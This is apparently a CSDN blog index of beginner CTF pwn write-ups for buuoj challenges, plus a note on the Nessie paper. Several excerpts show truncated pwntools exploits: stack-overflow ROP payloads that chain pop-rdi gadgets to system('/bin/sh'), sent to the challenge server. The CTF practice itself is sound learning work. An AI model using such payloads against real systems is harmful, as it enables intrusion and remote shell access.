自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

bing_Max的博客

  • 博客(14)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 ICSE (2022). Nessie的阅读记录

题目:Nessie: Automatically Testing JavaScript APIs with Asynchronous Callbacks问题 :几个不理解的名词1:什么是JavaScript APIs?2:什么是Asynchronous ?与synchronous的区别?3:什么是 Callbacks ? Asynchronous Callbacks ?一、ABSTRACT第1句原文:Previous algorithms for feedback-direc

2022-04-06 10:56:34 4228

原创 CTF buuoj pwn-----[HarekazeCTF2019]baby_rop

expfrom pwn import *sh = remote('node4.buuoj.cn', 342414) # 连接一个远程靶机。elf = ELF('./babyrop') # elf函数调用,elf可以bin_sh_addr = 0x601048system_addr = 0x601060pop_rdi_addr = 0x400683payload = b'a'*0x10 + b'a'*8 + p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(

2021-10-11 15:09:52 1876 1

原创 CTF buuoj pwn-----第12题: ciscn_2019_s_3

函数分析编写expfrom pwn import *sh = remote('node4.buuoj.cn', 27939)context(arch='amd64',os='linux', log_level='debug')main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.

2021-10-09 17:31:35 1447 2

原创 CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016

前言bss是指那些没有初始化的和初始化为0的全局变量bss类型的全局变量只占运行时的内存空间,而不占文件空间。data类型的全局变量是既占文件空间,又占用运行时内存空间的。rodata 的意义同样明显,ro代表read only,即只读数据(const)在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及

2021-09-30 15:39:27 1183

原创 CTF buuoj pwn-----第10题: bjdctf_2020_babystack

思路本体有后门函数, 最简单的是直接调用.这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag编写expfrom pwn import * con

2021-09-28 10:33:01 22216

原创 CTF buuoj pwn-----第9题:jarvisoj_level2

1. checksecbing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2[*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000).

2021-09-27 17:21:00 717

原创 CTF buuoj pwn-----第8题:[OGeek2019]babyrop

CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag前言梳理记录一下这道题的解题过程.1. checksecbing@bing-virtual-machine:~/pwn$ checksec babyrop[*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F

2021-09-27 14:43:50 458

原创 CTF buuoj pwn-----第7题:ciscn_2019_c_1

CTF buuoj pwn-----第7题:ciscn_2019_c_1前言1.checksec2. IDA 静态分析3. 解题思路4. 编写EXP5. 运行EXP, 获取flag后记前言重新梳理记录一下这道题的解题过程.1.checksec还是先看一下保护:bing@bing-virtual-machine:~/pwn$ checksec ./ciscn_2019_c_1[*] '/home/bing/pwn/ciscn_2019_c_1' Arch: amd64-64-li

2021-09-23 10:50:16 608

原创 汇总: pwn分析工具GDB + peda + objdump + readelf

汇总: pwn分析工具GDB + peda + objdump + readelf前言1、GDB的基本操作2、GDB增强工具peda3、GNU工具链 (GNU Toolchain): objdump + readelf前言本篇内容持续完善中…GDB是一个由GNU开源组织发布的、UNIX/LINUX操作系统下的、基于命令行的、功能强大的程序调试工具. GDB主要来调试C/C++语言写的程序,GDB调试是可执行文件而不是.c文件.GDB的一些增强工具:peda,pwbdbg,gef等.GN..

2021-09-10 15:22:05 965

原创 CTF buuoj pwn-----第6题:jarvisoj_level0

CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag前言记录一下pwn的过程, 新手学习日记, 流水线记录.打开题目, 连接靶机,下载文件level0一、checksec 检测文件的保护机制bing@bing-virtual-machine:~/pwn$ checksec ./level0[*] '/home/bing/pwn/level0'

2021-09-02 11:29:23 957

原创 CTF buuoj pwn-----第4题:ciscn_2019_n_1

CTF buuoj pwn-----第4题:ciscn_2019_n_1前言一. checkesc ,检测文件的保护机制二. 静态分析,IDA打开文件前言记录一下pwn的过程 同第1、2、3题一样,新手学习日记,流水线记录.打开题目, 连接靶机,下载文件ciscn_2019_n_1一. checkesc ,检测文件的保护机制bing@bing-virtual-machine:~/pwn$ checksec ciscn_2019_n_1[*] '/home/bing/pwn/cisc

2021-08-29 23:42:24 506

原创 CTF buuoj pwn-----第3题:warmup_csaw_2016

CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技

2021-08-29 00:21:58 1614 1

原创 CTF buuoj pwn-----第2题:rip

CTF buuoj pwn-----第2题:rip记录一下pwn的过程同第1题一样,新手学习日记,流水线记录.打开题目,连接靶机,下载文件’ript’1. 首先checkesc ,检测文件的保护机制.checksec在下载好pwntools后就有参考链接: link.参考链接: link.bing@bing-virtual-machine:~/pwn$ checksec test[*] '/home/bing/pwn/test' Arch: amd64-64-lit

2021-08-28 19:24:52 2380 1

原创 BUUCTF PWN-----第1题:test_your_nc

buuoj-----第四题:ciscn_2019_n_1前言简单记录一下pwn的过程首先checkesc ,检测文件的保护机制.参考链接: link.参考链接: link.bing@bing-virtual-machine:~/pwn$ checksec test[*] '/home/bing/pwn/test' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found

2021-08-27 13:33:00 13077 8

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除